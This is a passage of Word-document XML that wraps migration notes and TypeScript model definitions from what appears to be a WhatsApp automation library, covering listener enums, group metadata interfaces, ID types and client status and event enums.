        </w:rPr>
        <w:t xml:space="preserve">  - `onLogout`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - `onStateChanged`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - plus license-gated or group/product/story-related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enum is central to how the legacy system auto-registers listeners, builds event signatures, exposes webhook registration, and powers collectors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- It is one of the most important event-surface inventories in the package.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The simple-listener surface should remain enumerable and machine-discoverable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Event registration systems should be able to build derived behavior (webhooks, collectors, bridges) from a single event-name inventory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- License-gated or optional listeners should still be distinguishable from baseline listeners.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Canonical simple-listener inventory | Preserve | Central to event parity. |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">| Exact enum members | Intentionally changed | Surface can evolve if mapping is explicit.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event/listener definitions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Outputs: canonical simple-listener names.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Side effects: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listener inventory entry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Event semantic ambiguity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event registration/webhook/collector layers reference a shared event-name source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Guarantees: baseline and optional listeners stay distinguishable.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`LISTENER_DEFINED -&gt; ENUMERABLE_EVENT_SURFACE`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packages/legacy-documented/src/api/model/events.pseudo.md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packages/legacy-documented/src/api/model/events.ts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An enum of all the "simple listeners". A simple listener is a listener that just takes one parameter which is the callback function to handle the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export enum SimpleListener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 'onMessage',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[[onAnyMessage]]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AnyMessage = 'onAnyMessage',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[[onMessageDeleted]]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MessageDeleted = 'onMessageDeleted',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Ack = 'onAck',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[[onAddedToGroup]]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AddedToGroup = 'onAddedToGroup',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[[onChatDeleted]]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ChatDeleted = 'onChatDeleted',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[[onBattery]]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Battery = 'onBattery',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[[onChatOpened]]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ChatOpened = 'onChatOpened',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[[onIncomingCall]]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IncomingCall = 'onIncomingCall',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[[onIncomingCall]]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CallState = 'onCallState',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[[onGlobalParticipantsChanged]]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GlobalParticipantsChanged = 'onGlobalParticipantsChanged',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[[onGroupApprovalRequest]]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GroupApprovalRequest = 'onGroupApprovalRequest',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[[onChatState]]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ChatState = 'onChatState',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[[onLogout]]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Logout = 'onLogout',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Next two require extra params so not available to use via webhook register</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // LiveLocation = 'onLiveLocation',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // ParticipantsChanged = 'onParticipantsChanged',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[[onPlugged]]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Plugged = 'onPlugged',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[[onStateChanged]]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StateChanged = 'onStateChanged',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 = 'onButton',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PollVote = 'onPollVote',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 = 'onBroadcast',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Represents [[onLabel]]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 = 'onLabel',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Story = 'onStory',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[[onRemovedFromGroup]]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RemovedFromGroup = 'onRemovedFromGroup',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[[onContactAdded]]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ContactAdded = 'onContactAdded',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[[onContactAdded]]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Order = 'onOrder',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[[onNewProduct]]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NewProduct = 'onNewProduct',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 = 'onReaction',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Requires licence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     * Represents [[onGroupChange]]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GroupChange = 'onGroupChange'</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packages/legacy-documented/src/api/model/events.ts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packages/legacy-documented/src/api/model/group-metadata.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ChatId, ContactId, GroupChatId, NonSerializedId, DataURL, GroupId, MessageId } from './aliases';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { Contact } from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Participant {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  contact: Contact,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  id: NonSerializedId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isAdmin: boolean,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  isSuperAdmin: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GroupMetadata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 id of the group [[GroupChatId]]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GroupChatId;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when the group was created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creation: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owner of the group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owner: NonSerializedId;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participants in the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participants: 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pendingParticipants: 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description of the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account that set the description last.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descOwner ?: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trusted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sure what this represents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suspended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Not sure what this represents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support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 this group a parent group (a.k.a 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isParentGroup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groupType: 'DEAFULT' | 'SUBGROUP' | 'COMMUNITY'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Communities have a default group chat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defaultSubgroup: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isParentGroupClosed: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of Group IDs that the host account has joined as part of this community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joinedSubgroups: GroupId[]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enum groupChangeEvent {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  remove = 'remove',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  add = 'add'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ParticipantChangedEventModel {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  by: ContactId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  action: groupChangeEvent,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  who: ContactId[]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  chat: ChatId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Group notification types</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GroupNotificationTypes {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ADD = 'add',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  INVITE = 'invite',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  REMOVE = 'remove',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  LEAVE = 'leave',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  SUBJECT = 'subject',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  DESCRIPTION = 'description',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  PICTURE = 'picture',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ANNOUNCE = 'announce',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  RESTRICT = 'restrict',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Used when creating a new community with.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interface NewCommunityGroup {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  subject : string,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  icon ?: DataURL,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ephemeralDuration ?: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GenericGroupChangeEvent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who triggered this event. (E.g the contact who changed the group picture)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Some more information about the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groupMetadata: GroupMetadata,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Base 64 encoded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groupPic: string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  id: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Type of the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'picutre' | 'create' | 'delete' | 'subject' | 'revoke_invite' | 'description' | 'restrict' | 'announce' | 'no_frequently_forwarded' | 'announce_msg_bounce' | 'add' | 'remove' | 'demote' | 'promote' | 'invite' | 'leave' | 'modify' | 'v4_add_invite_sent' | 'v4_add_invite_join' | 'growth_locked' | 'growth_unlocked' | 'linked_group_join'</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packages/legacy-documented/src/api/model/group-metadata.ts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packages/legacy-documented/src/api/model/id.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export interface Id {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  server: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  user: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  _serialized: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packages/legacy-documented/src/api/model/id.ts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packages/legacy-documented/src/api/model/index.pseudo.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># api/model/index.ts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`packages/legacy/src/api/model/index.ts`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main model barrel for the legacy package.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- It re-exports all major domain types and defines shared enums that describe session/runtime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`api/model/index.ts:1-8` — re-export primary entity models such as chat, call, contact, message, errors, events, product, reactions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- `api/model/index.ts:16-20` — `Status` enum for client lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- `api/model/index.ts:27-42` — `Events` enum for high-level client events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- `api/model/index.ts:49-106` — `STATE` enum describing WA session states such as `CONNECTED`, `UNPAIRED`, `TIMEOUT`, `TOS_BLOCK`, `SYNCING`, `DISCONNECTED`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- `api/model/index.ts:108-117` — additional exports including `EasyApiResponse`, config/media/alias/label types.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captures the semantic vocabulary the rest of the legacy system speaks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Migration work should preserve meaning even if the exact enum names or transport shapes evolve.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Shared session/event enums should remain stable enough that runtime state is interpretable across layers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- If enum names change in v5, there should still be an unambiguous mapping from old state meaning to new state meaning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Public model barrels should group the major runtime vocabulary in one discoverable place.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Central domain vocabulary | Preserve | Important for migration and runtime clarity. |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">| Exact enum/module layout | Intentionally changed | Layout can evolve if meaning stays mappable.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model/type definitions from leaf files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Outputs: central model exports and shared lifecycle/state enums.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Side effects: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Enum semantic drift</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Missing model re-exports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leaf model definitions remain coherent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Guarantees: consumers can import core session/event vocabulary from one barrel.</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`LEAF_MODELS_DEFINED -&gt; BARREL_EXPORTED`</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packages/legacy-documented/src/api/model/index.pseudo.md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packages/legacy-documented/src/api/model/index.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export * from './chat';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export * from './call';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export * from './contact';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export * from './message';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export * from './errors';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export * from './events';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export * from './product';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export * from './reactions';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Client status</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Status {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    INITIALIZING = 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    AUTHENTICATING = 1,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    READY = 3</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Events that can be emitted by the client</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Events {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    AUTHENTICATED = 'authenticated',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    AUTHENTICATION_FAILURE = 'auth_failure',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    READY = 'ready',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    MESSAGE_RECEIVED = 'message',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    MESSAGE_CREATE = 'message_create',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    MESSAGE_REVOKED_EVERYONE = 'message_revoke_everyone',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    MESSAGE_REVOKED_ME = 'message_revoke_me',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
